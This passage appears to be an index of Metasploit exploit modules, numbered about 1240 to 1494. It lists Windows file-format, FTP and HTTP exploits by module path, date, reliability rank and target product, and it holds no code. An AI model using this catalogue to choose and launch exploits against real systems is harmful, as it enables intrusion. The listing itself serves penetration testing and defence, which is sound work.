OLE Package Manager Code Execution Through Python + 1240 windows/fileformat/ms14_064_packager_run_as_admin 2014-10-21 excellent No MS14-064 Microsoft Windows OLE Package Manager Code Execution + 1241 windows/fileformat/ms15_020_shortcut_icon_dllloader 2015-03-10 excellent No Microsoft Windows Shell LNK Code Execution + 1242 windows/fileformat/ms15_100_mcl_exe 2015-09-08 excellent No MS15-100 Microsoft Windows Media Center MCL Vulnerability + 1243 windows/fileformat/ms_visual_basic_vbp 2007-09-04 good No Microsoft Visual Basic VBP Buffer Overflow + 1244 windows/fileformat/mswin_tiff_overflow 2013-11-05 average No MS13-096 Microsoft Tagged Image File Format (TIFF) Integer Overflow + 1245 windows/fileformat/msworks_wkspictureinterface 2008-11-28 low No Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Code Execution + 1246 windows/fileformat/mymp3player_m3u 2010-03-18 good No Steinberg MyMP3Player 3.0 Buffer Overflow + 1247 windows/fileformat/netop 2011-04-28 normal No NetOp Remote Control Client 9.5 Buffer Overflow + 1248 windows/fileformat/nitro_reader_jsapi 2017-07-24 excellent No Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution + 1249 windows/fileformat/nuance_pdf_launch_overflow 2010-10-08 great No Nuance PDF Reader v6.0 Launch Stack Buffer Overflow + 1250 windows/fileformat/office_dde_delivery 2017-10-09 manual No Microsoft Office DDE Payload Delivery + 1251 windows/fileformat/office_excel_slk 2018-10-07 manual No Microsoft Excel .SLK Payload Delivery + 1252 windows/fileformat/office_ms17_11882 2017-11-15 manual No Microsoft Office CVE-2017-11882 + 1253 windows/fileformat/office_ole_multiple_dll_hijack 2015-12-08 normal No Office OLE Multiple DLL Side Loading Vulnerabilities + 1254 windows/fileformat/office_word_hta 2017-04-14 excellent No Microsoft Office Word Malicious Hta Execution + 1255 windows/fileformat/openoffice_ole 2008-04-17 normal No OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow + 1256 windows/fileformat/orbit_download_failed_bof 2008-04-03 normal No Orbit Downloader URL Unicode Conversion Overflow + 1257 windows/fileformat/orbital_viewer_orb 2010-02-27 great No Orbital Viewer ORB File Parsing Buffer Overflow + 1258 windows/fileformat/ovf_format_string 2012-11-08 normal No VMWare OVF Tools Format String Vulnerability + 1259 windows/fileformat/proshow_cellimage_bof 2009-08-20 great No ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow + 1260 windows/fileformat/proshow_load_bof 2012-06-06 normal No Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow + 1261 windows/fileformat/publishit_pui 2014-02-05 normal No Publish-It PUI Buffer Overflow (SEH) + 1262 windows/fileformat/real_networks_netzip_bof 2011-01-30 good No Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow Vulnerability + 1263 windows/fileformat/real_player_url_property_bof 2012-12-14 normal No RealPlayer RealMedia File Handling Buffer Overflow + 1264 windows/fileformat/realplayer_ver_attribute_bof 2013-12-20 normal No RealNetworks RealPlayer Version Attribute Buffer Overflow + 1265 windows/fileformat/safenet_softremote_groupname 2009-10-30 good No SafeNet SoftRemote GROUPNAME Buffer Overflow + 1266 windows/fileformat/sascam_get 2008-12-29 low No SasCam Webcam Server v.2.6.5 Get() Method Buffer Overflow + 1267 windows/fileformat/scadaphone_zip 2011-09-12 good No ScadaTEC ScadaPhone Stack Buffer Overflow + 1268 windows/fileformat/shadow_stream_recorder_bof 2010-03-29 normal No Shadow Stream Recorder 3.0.1.7 Buffer Overflow + 1269 windows/fileformat/shaper_pdf_bof 2015-10-03 normal No PDF Shaper Buffer Overflow + 1270 windows/fileformat/somplplayer_m3u 2010-01-22 great No S.O.M.P.L 1.0 Player Buffer Overflow + 1271 windows/fileformat/subtitle_processor_m3u_bof 2011-04-26 normal No Subtitle Processor 7.7.1 .M3U SEH Unicode Buffer Overflow + 1272 windows/fileformat/syncbreeze_xml 2017-03-29 normal No Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow + 1273 windows/fileformat/tfm_mmplayer_m3u_ppl_bof 2012-03-23 good No TFM MMPlayer (m3u/ppl File) Buffer Overflow + 1274 windows/fileformat/total_video_player_ini_bof 2013-11-24 normal No Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow + 1275 windows/fileformat/tugzip 2008-10-28 good No TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability + 1276 windows/fileformat/ultraiso_ccd 2009-04-03 great No UltraISO CCD File Parsing Buffer Overflow + 1277 windows/fileformat/ultraiso_cue 2007-05-24 great No UltraISO CUE File Parsing Buffer Overflow + 1278 windows/fileformat/ursoft_w32dasm 2005-01-24 good No URSoft W32Dasm Disassembler Function Buffer Overflow + 1279 windows/fileformat/varicad_dwb 2010-03-17 great No VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow + 1280 windows/fileformat/videocharge_studio 2013-10-27 normal No VideoCharge Studio Buffer Overflow (SEH) + 1281 windows/fileformat/videolan_tivo 2008-10-22 good No VideoLAN VLC TiVo Buffer Overflow + 1282 windows/fileformat/videospirit_visprj 2011-04-11 good No VeryTools Video Spirit Pro + 1283 windows/fileformat/visio_dxf_bof 2010-05-04 good No Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability + 1284 windows/fileformat/visiwave_vwr_type 2011-05-20 great No VisiWave VWR File Parsing Vulnerability + 1285 windows/fileformat/vlc_mkv 2018-05-24 great No VLC Media Player MKV Use After Free + 1286 windows/fileformat/vlc_modplug_s3m 2011-04-07 average No VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow + 1287 windows/fileformat/vlc_realtext 2008-11-05 good No VLC Media Player RealText Subtitle Overflow + 1288 windows/fileformat/vlc_smb_uri 2009-06-24 great No VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow + 1289 windows/fileformat/vlc_webm 2011-01-31 good No VideoLAN VLC MKV Memory Corruption + 1290 windows/fileformat/vuplayer_cue 2009-08-18 good No VUPlayer CUE Buffer Overflow + 1291 windows/fileformat/vuplayer_m3u 2009-08-18 good No VUPlayer M3U Buffer Overflow + 1292 windows/fileformat/watermark_master 2013-11-01 normal No Watermark Master Buffer Overflow (SEH) + 1293 windows/fileformat/winamp_maki_bof 2009-05-20 normal No Winamp MAKI Buffer Overflow + 1294 windows/fileformat/winrar_ace 2019-02-05 excellent No RARLAB WinRAR ACE Format Input Validation Remote Code Execution + 1295 windows/fileformat/winrar_name_spoofing 2009-09-28 excellent No WinRAR Filename Spoofing + 1296 windows/fileformat/wireshark_mpeg_overflow 2014-03-20 good No Wireshark wiretap/mpeg.c Stack Buffer Overflow + 1297 windows/fileformat/wireshark_packet_dect 2011-04-18 good No Wireshark packet-dect.c Stack Buffer Overflow (local) + 1298 windows/fileformat/wm_downloader_m3u 2010-07-28 normal No WM Downloader 3.1.2.2 Buffer Overflow + 1299 windows/fileformat/xenorate_xpl_bof 2009-08-19 great No Xenorate 2.50 (.xpl) Universal Local Buffer Overflow (SEH) + 1300 windows/fileformat/xion_m3u_sehbof 2010-11-23 great No Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow + 1301 windows/fileformat/xradio_xrl_sehbof 2011-02-08 normal No xRadio 0.95b Buffer Overflow + 1302 windows/fileformat/zahir_enterprise_plus_csv 2018-09-28 normal No Zahir Enterprise Plus 6 Stack Buffer Overflow + 1303 windows/fileformat/zinfaudioplayer221_pls 2004-09-24 good No Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow + 1304 windows/firewall/blackice_pam_icq 2004-03-18 great No ISS PAM.dll ICQ Parser Buffer Overflow + 1305 windows/firewall/kerio_auth 2003-04-28 average No Kerio Firewall 2.1.4 Authentication Packet Overflow + 1306 windows/ftp/32bitftp_list_reply 2010-10-12 good No 32bit FTP Client Stack Buffer Overflow + 1307 windows/ftp/3cdaemon_ftp_user 2005-01-04 average Yes 3Com 3CDaemon 2.0 FTP Username Overflow + 1308 windows/ftp/aasync_list_reply 2010-10-12 good No AASync v2.2.1.0 (Win32) Stack Buffer Overflow (LIST) + 1309 windows/ftp/ability_server_stor 2004-10-22 normal Yes Ability Server 2.34 STOR Command Stack Buffer Overflow + 1310 windows/ftp/absolute_ftp_list_bof 2011-11-09 normal No AbsoluteFTP 1.9.6 - 2.2.10 LIST Command Remote Buffer Overflow + 1311 windows/ftp/ayukov_nftp 2017-10-21 normal No Ayukov NFTP FTP Client Buffer Overflow + 1312 windows/ftp/bison_ftp_bof 2011-08-07 normal Yes BisonWare BisonFTP Server Buffer Overflow + 1313 windows/ftp/cesarftp_mkd 2006-06-12 average Yes Cesar FTP 0.99g MKD Command Buffer Overflow + 1314 windows/ftp/comsnd_ftpd_fmtstr 2012-06-08 good Yes ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability + 1315 windows/ftp/dreamftp_format 2004-03-03 good Yes BolinTech Dream FTP Server 1.02 Format String + 1316 windows/ftp/easyfilesharing_pass 2006-07-31 average Yes Easy File Sharing FTP Server 2.0 PASS Overflow + 1317 windows/ftp/easyftp_cwd_fixret 2010-02-16 great Yes EasyFTP Server CWD Command Stack Buffer Overflow + 1318 windows/ftp/easyftp_list_fixret 2010-07-05 great Yes EasyFTP Server LIST Command Stack Buffer Overflow + 1319 windows/ftp/easyftp_mkd_fixret 2010-04-04 great Yes EasyFTP Server MKD Command Stack Buffer Overflow + 1320 windows/ftp/filecopa_list_overflow 2006-07-19 average No FileCopa FTP Server Pre 18 Jul Version + 1321 windows/ftp/filewrangler_list_reply 2010-10-12 good No FileWrangler 5.30 Stack Buffer Overflow + 1322 windows/ftp/freefloatftp_user 2012-06-12 normal Yes Free Float FTP Server USER Command Buffer Overflow + 1323 windows/ftp/freefloatftp_wbem 2012-12-07 excellent Yes FreeFloat FTP Server Arbitrary File Upload + 1324 windows/ftp/freeftpd_pass 2013-08-20 normal Yes freeFTPd PASS Command Buffer Overflow + 1325 windows/ftp/freeftpd_user 2005-11-16 average Yes freeFTPd 1.0 Username Overflow + 1326 windows/ftp/ftpgetter_pwd_reply 2010-10-12 good No FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD) + 1327 windows/ftp/ftppad_list_reply 2010-10-12 good No FTPPad 1.2.0 Stack Buffer Overflow + 1328 windows/ftp/ftpshell51_pwd_reply 2010-10-12 good No FTPShell 5.1 Stack Buffer Overflow + 1329 windows/ftp/ftpshell_cli_bof 2017-03-04 normal No FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow + 1330 windows/ftp/ftpsynch_list_reply 2010-10-12 good No FTP Synchronizer Professional 4.0.73.274 Stack Buffer Overflow + 1331 windows/ftp/gekkomgr_list_reply 2010-10-12 good No Gekko Manager FTP Client Stack Buffer Overflow + 1332 windows/ftp/globalscapeftp_input 2005-05-01 great No GlobalSCAPE Secure FTP Server Input Overflow + 1333 windows/ftp/goldenftp_pass_bof 2011-01-23 average Yes GoldenFTP PASS Stack Buffer Overflow + 1334 windows/ftp/httpdx_tolog_format 2009-11-17 great Yes HTTPDX tolog() Function Format String Vulnerability + 1335 windows/ftp/kmftp_utility_cwd 2015-08-23 normal Yes Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow + 1336 windows/ftp/labf_nfsaxe 2017-05-15 normal No LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow + 1337 windows/ftp/leapftp_list_reply 2010-10-12 good No LeapFTP 3.0.1 Stack Buffer Overflow + 1338 windows/ftp/leapftp_pasv_reply 2003-06-09 normal No LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow + 1339 windows/ftp/ms09_053_ftpd_nlst 2009-08-31 great No MS09-053 Microsoft IIS FTP Server NLST Response Overflow + 1340 windows/ftp/netterm_netftpd_user 2005-04-26 great Yes NetTerm NetFTPD USER Buffer Overflow + 1341 windows/ftp/odin_list_reply 2010-10-12 good No Odin Secure FTP 4.1 Stack Buffer Overflow (LIST) + 1342 windows/ftp/open_ftpd_wbem 2012-06-18 excellent Yes Open-FTPD 1.2 Arbitrary File Upload + 1343 windows/ftp/oracle9i_xdb_ftp_pass 2003-08-18 great Yes Oracle 9i XDB FTP PASS Overflow (win32) + 1344 windows/ftp/oracle9i_xdb_ftp_unlock 2003-08-18 great Yes Oracle 9i XDB FTP UNLOCK Overflow (win32) + 1345 windows/ftp/pcman_put 2015-08-07 normal Yes PCMAN FTP Server Buffer Overflow - PUT Command + 1346 windows/ftp/pcman_stor 2013-06-27 normal Yes PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow + 1347 windows/ftp/proftp_banner 2009-08-25 normal No ProFTP 2.9 Banner Remote Buffer Overflow + 1348 windows/ftp/quickshare_traversal_write 2011-02-03 excellent Yes QuickShare File Server 1.2.1 Directory Traversal Vulnerability + 1349 windows/ftp/ricoh_dl_bof 2012-03-01 normal Yes Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow + 1350 windows/ftp/sami_ftpd_list 2013-02-27 low No Sami FTP Server LIST Command Buffer Overflow + 1351 windows/ftp/sami_ftpd_user 2006-01-24 normal Yes KarjaSoft Sami FTP Server v2.02 USER Overflow + 1352 windows/ftp/sasser_ftpd_port 2004-05-10 average No Sasser Worm avserve FTP PORT Buffer Overflow + 1353 windows/ftp/scriptftp_list 2011-10-12 good No ScriptFTP LIST Remote Buffer Overflow + 1354 windows/ftp/seagull_list_reply 2010-10-12 good No Seagull FTP v3.3 Build 409 Stack Buffer Overflow + 1355 windows/ftp/servu_chmod 2004-12-31 normal Yes Serv-U FTP Server Buffer Overflow + 1356 windows/ftp/servu_mdtm 2004-02-26 good Yes Serv-U FTPD MDTM Overflow + 1357 windows/ftp/slimftpd_list_concat 2005-07-21 great No SlimFTPd LIST Concatenation Overflow + 1358 windows/ftp/trellian_client_pasv 2010-04-11 normal No Trellian FTP Client 3.01 PASV Remote Buffer Overflow + 1359 windows/ftp/turboftp_port 2012-10-03 great Yes Turbo FTP Server 1.30.823 PORT Overflow + 1360 windows/ftp/vermillion_ftpd_port 2009-09-23 great Yes Vermillion FTP Daemon PORT Command Memory Corruption + 1361 windows/ftp/warftpd_165_pass 1998-03-19 average No War-FTPD 1.65 Password Overflow + 1362 windows/ftp/warftpd_165_user 1998-03-19 average No War-FTPD 1.65 Username Overflow + 1363 windows/ftp/wftpd_size 2006-08-23 average No Texas Imperial Software WFTPD 3.23 SIZE Overflow + 1364 windows/ftp/winaxe_server_ready 2016-11-03 good No WinaXe 7.7 FTP Client Remote Buffer Overflow + 1365 windows/ftp/wing_ftp_admin_exec 2014-06-19 excellent Yes Wing FTP Server Authenticated Command Execution + 1366 windows/ftp/wsftp_server_503_mkd 2004-11-29 great Yes WS-FTP Server 5.03 MKD Overflow + 1367 windows/ftp/wsftp_server_505_xmd5 2006-09-14 average Yes Ipswitch WS_FTP Server 5.05 XMD5 Overflow + 1368 windows/ftp/xftp_client_pwd 2010-04-22 normal No Xftp FTP Client 3.0 PWD Remote Buffer Overflow + 1369 windows/ftp/xlink_client 2009-10-03 normal No Xlink FTP Client Buffer Overflow + 1370 windows/ftp/xlink_server 2009-10-03 good Yes Xlink FTP Server Buffer Overflow + 1371 windows/games/mohaa_getinfo 2004-07-17 great No Medal of Honor Allied Assault getinfo Stack Buffer Overflow + 1372 windows/games/racer_503beta5 2008-08-10 great No Racer v0.5.3 Beta 5 Buffer Overflow + 1373 windows/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Win32) + 1374 windows/http/adobe_robohelper_authbypass 2009-09-23 excellent No Adobe RoboHelp Server 8 Arbitrary File Upload and Execute + 1375 windows/http/altn_securitygateway 2008-06-02 average Yes Alt-N SecurityGateway username Buffer Overflow + 1376 windows/http/altn_webadmin 2003-06-24 average No Alt-N WebAdmin USER Buffer Overflow + 1377 windows/http/amlibweb_webquerydll_app 2010-08-03 normal Yes Amlibweb NetOpacs webquery.dll Stack Buffer Overflow + 1378 windows/http/apache_chunked 2002-06-19 good Yes Apache Win32 Chunked Encoding + 1379 windows/http/apache_mod_rewrite_ldap 2006-07-28 great Yes Apache Module mod_rewrite LDAP Protocol Buffer Overflow + 1380 windows/http/apache_modjk_overflow 2007-03-02 great Yes Apache mod_jk 1.2.20 Buffer Overflow + 1381 windows/http/avaya_ccr_imageupload_exec 2012-06-28 excellent No Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution + 1382 windows/http/badblue_ext_overflow 2003-04-20 great Yes BadBlue 2.5 EXT.dll Buffer Overflow + 1383 windows/http/badblue_passthru 2007-12-10 great No BadBlue 2.72b PassThru Buffer Overflow + 1384 windows/http/bea_weblogic_jsessionid 2009-01-13 good No BEA WebLogic JSESSIONID Cookie Value Overflow + 1385 windows/http/bea_weblogic_post_bof 2008-07-17 great Yes Oracle Weblogic Apache Connector POST Request Buffer Overflow + 1386 windows/http/bea_weblogic_transfer_encoding 2008-09-09 great No BEA Weblogic Transfer-Encoding Buffer Overflow + 1387 windows/http/belkin_bulldog 2009-03-08 average No Belkin Bulldog Plus Web Service Buffer Overflow + 1388 windows/http/ca_arcserve_rpc_authbypass 2011-07-25 excellent No CA Arcserve D2D GWT RPC Credential Information Disclosure + 1389 windows/http/ca_igateway_debug 2005-10-06 average Yes CA iTechnology iGateway Debug Mode Buffer Overflow + 1390 windows/http/ca_totaldefense_regeneratereports 2011-04-13 excellent No CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection + 1391 windows/http/cogent_datahub_command 2014-04-29 manual Yes Cogent DataHub Command Injection + 1392 windows/http/cogent_datahub_request_headers_bof 2013-07-26 normal Yes Cogent DataHub HTTP Server Buffer Overflow + 1393 windows/http/coldfusion_fckeditor 2009-07-03 excellent No ColdFusion 8.0.1 Arbitrary File Upload and Execute + 1394 windows/http/cyclope_ess_sqli 2012-08-08 excellent Yes Cyclope Employee Surveillance Solution v6 SQL Injection + 1395 windows/http/desktopcentral_file_upload 2013-11-11 excellent Yes ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload + 1396 windows/http/desktopcentral_statusupdate_upload 2014-08-31 excellent Yes ManageEngine Desktop Central StatusUpdate Arbitrary File Upload + 1397 windows/http/disk_pulse_enterprise_bof 2016-10-03 excellent Yes Disk Pulse Enterprise Login Buffer Overflow + 1398 windows/http/disk_pulse_enterprise_get 2017-08-25 excellent Yes Disk Pulse Enterprise GET Buffer Overflow + 1399 windows/http/diskboss_get_bof 2016-12-05 excellent Yes DiskBoss Enterprise GET Buffer Overflow + 1400 windows/http/disksavvy_get_bof 2016-12-01 excellent Yes DiskSavvy Enterprise GET Buffer Overflow + 1401 windows/http/disksorter_bof 2017-03-15 great Yes Disk Sorter Enterprise GET Buffer Overflow + 1402 windows/http/dup_scout_enterprise_login_bof 2017-11-14 excellent Yes Dup Scout Enterprise Login Buffer Overflow + 1403 windows/http/dupscts_bof 2017-03-15 great Yes Dup Scout Enterprise GET Buffer Overflow + 1404 windows/http/easychatserver_seh 2017-10-09 normal No Easy Chat Server User Registeration Buffer Overflow (SEH) + 1405 windows/http/easyfilesharing_post 2017-06-12 normal No Easy File Sharing HTTP Server 7.2 POST Buffer Overflow + 1406 windows/http/easyfilesharing_seh 2015-12-02 normal No Easy File Sharing HTTP Server 7.2 SEH Overflow + 1407 windows/http/easyftp_list 2010-02-18 great Yes EasyFTP Server list.html path Stack Buffer Overflow + 1408 windows/http/edirectory_host 2006-10-21 great No Novell eDirectory NDS Server Host Header Overflow + 1409 windows/http/edirectory_imonitor 2005-08-11 great No eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow + 1410 windows/http/efs_easychatserver_username 2007-08-14 great Yes EFS Easy Chat Server Authentication Request Handling Buffer Overflow + 1411 windows/http/efs_fmws_userid_bof 2014-05-20 normal Yes Easy File Management Web Server Stack Buffer Overflow + 1412 windows/http/ektron_xslt_exec 2012-10-16 excellent Yes Ektron 8.02 XSLT Transform Remote Code Execution + 1413 windows/http/ektron_xslt_exec_ws 2015-02-05 excellent Yes Ektron 8.5, 8.7, 9.0 XSLT Transform Remote Code Execution + 1414 windows/http/ericom_access_now_bof 2014-06-02 normal Yes Ericom AccessNow Server Buffer Overflow + 1415 windows/http/ezserver_http 2012-06-18 excellent No EZHomeTech EzServer Stack Buffer Overflow Vulnerability + 1416 windows/http/fdm_auth_header 2009-02-02 great No Free Download Manager Remote Control Server Buffer Overflow + 1417 windows/http/generic_http_dll_injection 2015-03-04 manual No Generic Web Application DLL Injection + 1418 windows/http/geutebrueck_gcore_x64_rce_bo 2017-01-24 normal Yes Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE + 1419 windows/http/gitstack_rce 2018-01-15 great No GitStack Unsanitized Argument RCE + 1420 windows/http/hp_autopass_license_traversal 2014-01-10 great Yes HP AutoPass License Server File Upload + 1421 windows/http/hp_imc_bims_upload 2013-10-08 excellent Yes HP Intelligent Management Center BIMS UploadServlet Directory Traversal + 1422 windows/http/hp_imc_java_deserialize 2017-10-03 excellent Yes HP Intelligent Management Java Deserialization RCE + 1423 windows/http/hp_imc_mibfileupload 2013-03-07 great Yes HP Intelligent Management Center Arbitrary File Upload + 1424 windows/http/hp_loadrunner_copyfiletoserver 2013-10-30 excellent Yes HP LoadRunner EmulationAdmin Web Service Directory Traversal + 1425 windows/http/hp_mpa_job_acct 2011-12-21 excellent Yes HP Managed Printing Administration jobAcct Remote Command Execution + 1426 windows/http/hp_nnm_getnnmdata_hostname 2010-05-11 great No HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow + 1427 windows/http/hp_nnm_getnnmdata_icount 2010-05-11 great No HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow + 1428 windows/http/hp_nnm_getnnmdata_maxage 2010-05-11 great No HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow + 1429 windows/http/hp_nnm_nnmrptconfig_nameparams 2011-01-10 normal No HP OpenView NNM nnmRptConfig nameParams Buffer Overflow + 1430 windows/http/hp_nnm_nnmrptconfig_schdparams 2011-01-10 normal No HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow + 1431 windows/http/hp_nnm_openview5 2007-12-06 great No HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow + 1432 windows/http/hp_nnm_ovalarm_lang 2009-12-09 great No HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow + 1433 windows/http/hp_nnm_ovas 2008-04-02 good Yes HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow + 1434 windows/http/hp_nnm_ovbuildpath_textfile 2011-11-01 normal No HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow + 1435 windows/http/hp_nnm_ovwebhelp 2009-12-09 great No HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow + 1436 windows/http/hp_nnm_ovwebsnmpsrv_main 2010-06-16 great No HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow + 1437 windows/http/hp_nnm_ovwebsnmpsrv_ovutil 2010-06-16 great No HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow + 1438 windows/http/hp_nnm_ovwebsnmpsrv_uro 2010-06-08 great No HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow + 1439 windows/http/hp_nnm_snmp 2009-12-09 great No HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow + 1440 windows/http/hp_nnm_snmpviewer_actapp 2010-05-11 great No HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow + 1441 windows/http/hp_nnm_toolbar_01 2009-01-07 great No HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow + 1442 windows/http/hp_nnm_toolbar_02 2009-01-21 normal No HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow + 1443 windows/http/hp_nnm_webappmon_execvp 2010-07-20 great No HP OpenView Network Node Manager execvp_nc Buffer Overflow + 1444 windows/http/hp_nnm_webappmon_ovjavalocale 2010-08-03 great No HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow + 1445 windows/http/hp_openview_insight_backdoor 2011-01-31 excellent No HP OpenView Performance Insight Server Backdoor Account Code Execution + 1446 windows/http/hp_pcm_snac_update_certificates 2013-09-09 excellent Yes HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload + 1447 windows/http/hp_pcm_snac_update_domain 2013-09-09 excellent Yes HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload + 1448 windows/http/hp_power_manager_filename 2011-10-19 normal No HP Power Manager 'formExportDataLogs' Buffer Overflow + 1449 windows/http/hp_power_manager_login 2009-11-04 average No Hewlett-Packard Power Manager Administration Buffer Overflow + 1450 windows/http/hp_sitescope_dns_tool 2015-10-09 good No HP SiteScope DNS Tool Command Injection + 1451 windows/http/hp_sitescope_runomagentcommand 2013-07-29 manual Yes HP SiteScope Remote Code Execution + 1452 windows/http/httpdx_handlepeer 2009-10-08 great Yes HTTPDX h_handlepeer() Function Buffer Overflow + 1453 windows/http/httpdx_tolog_format 2009-11-17 great Yes HTTPDX tolog() Function Format String Vulnerability + 1454 windows/http/ia_webmail 2003-11-03 average No IA WebMail 3.x Buffer Overflow + 1455 windows/http/ibm_tivoli_endpoint_bof 2011-05-31 good No IBM Tivoli Endpoint Manager POST Query Buffer Overflow + 1456 windows/http/ibm_tpmfosd_overflow 2007-05-02 good No IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow + 1457 windows/http/ibm_tsm_cad_header 2007-09-24 good No IBM Tivoli Storage Manager Express CAD Service Buffer Overflow + 1458 windows/http/icecast_header 2004-09-28 great No Icecast Header Overwrite + 1459 windows/http/integard_password_bof 2010-09-07 great No Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow + 1460 windows/http/intersystems_cache 2009-09-29 great No InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow + 1461 windows/http/intrasrv_bof 2013-05-30 manual Yes Intrasrv 1.0 Buffer Overflow + 1462 windows/http/ipswitch_wug_maincfgret 2004-08-25 great No Ipswitch WhatsUp Gold 8.03 Buffer Overflow + 1463 windows/http/jira_collector_traversal 2014-02-26 normal Yes JIRA Issues Collector Directory Traversal + 1464 windows/http/kaseya_uploader 2015-09-23 excellent Yes Kaseya VSA uploader.aspx Arbitrary File Upload + 1465 windows/http/kaseya_uploadimage_file_upload 2013-11-11 excellent Yes Kaseya uploadImage Arbitrary File Upload + 1466 windows/http/kolibri_http 2010-12-26 good Yes Kolibri HTTP Server HEAD Buffer Overflow + 1467 windows/http/landesk_thinkmanagement_upload_asp 2012-02-15 excellent No LANDesk Lenovo ThinkManagement Console Remote Command Execution + 1468 windows/http/lexmark_markvision_gfd_upload 2014-12-09 excellent Yes Lexmark MarkVision Enterprise Arbitrary File Upload + 1469 windows/http/mailenable_auth_header 2005-04-24 great Yes MailEnable Authorization Header Buffer Overflow + 1470 windows/http/manage_engine_opmanager_rce 2015-09-14 manual Yes ManageEngine OpManager Remote Code Execution + 1471 windows/http/manageengine_adshacluster_rce 2018-06-28 excellent Yes Manage Engine Exchange Reporter Plus Unauthenticated RCE + 1472 windows/http/manageengine_appmanager_exec 2018-03-07 excellent Yes ManageEngine Applications Manager Remote Code Execution + 1473 windows/http/manageengine_apps_mngr 2011-04-08 average No ManageEngine Applications Manager Authenticated Code Execution + 1474 windows/http/manageengine_connectionid_write 2015-12-14 excellent Yes ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability + 1475 windows/http/maxdb_webdbm_database 2006-08-29 good No MaxDB WebDBM Database Parameter Overflow + 1476 windows/http/maxdb_webdbm_get_overflow 2005-04-26 good No MaxDB WebDBM GET Buffer Overflow + 1477 windows/http/mcafee_epolicy_source 2006-07-17 average Yes McAfee ePolicy Orchestrator / ProtectionPilot Overflow + 1478 windows/http/mdaemon_worldclient_form2raw 2003-12-29 great Yes MDaemon WorldClient form2raw.cgi Stack Buffer Overflow + 1479 windows/http/minishare_get_overflow 2004-11-07 average No Minishare 1.4.1 Buffer Overflow + 1480 windows/http/miniweb_upload_wbem 2013-04-09 excellent Yes MiniWeb (Build 300) Arbitrary File Upload + 1481 windows/http/navicopa_get_overflow 2006-09-28 great Yes NaviCOPA 2.0.1 URL Handling Buffer Overflow + 1482 windows/http/netdecision_http_bof 2012-02-24 normal Yes NetDecision 4.5.1 HTTP Server Buffer Overflow + 1483 windows/http/netgear_nms_rce 2016-02-04 excellent Yes NETGEAR ProSafe Network Management System 300 Arbitrary File Upload + 1484 windows/http/novell_imanager_upload 2010-10-01 excellent No Novell iManager getMultiPartParameters Arbitrary File Upload + 1485 windows/http/novell_mdm_lfi 2013-03-13 excellent Yes Novell Zenworks Mobile Managment MDM.php Local File Inclusion Vulnerability + 1486 windows/http/novell_messenger_acceptlang 2006-04-13 average No Novell Messenger Server 2.0 Accept-Language Overflow + 1487 windows/http/nowsms 2008-02-19 good No Now SMS/MMS Gateway Buffer Overflow + 1488 windows/http/octopusdeploy_deploy 2017-05-15 excellent Yes Octopus Deploy Authenticated Code Execution + 1489 windows/http/oracle9i_xdb_pass 2003-08-18 great Yes Oracle 9i XDB HTTP PASS Overflow (win32) + 1490 windows/http/oracle_beehive_evaluation 2010-06-09 excellent Yes Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability + 1491 windows/http/oracle_beehive_prepareaudiotoplay 2015-11-10 excellent Yes Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload + 1492 windows/http/oracle_btm_writetofile 2012-08-07 excellent No Oracle Business Transaction Management FlashTunnelService Remote Code Execution + 1493 windows/http/oracle_endeca_exec 2013-07-16 excellent Yes Oracle Endeca Server Remote Command Execution + 1494 windows/http/oracle_event_processing_upload 2014-04-21 excellent Yes Oracle Event Processing FileUploadServlet Arbitrary File Upload + 1495 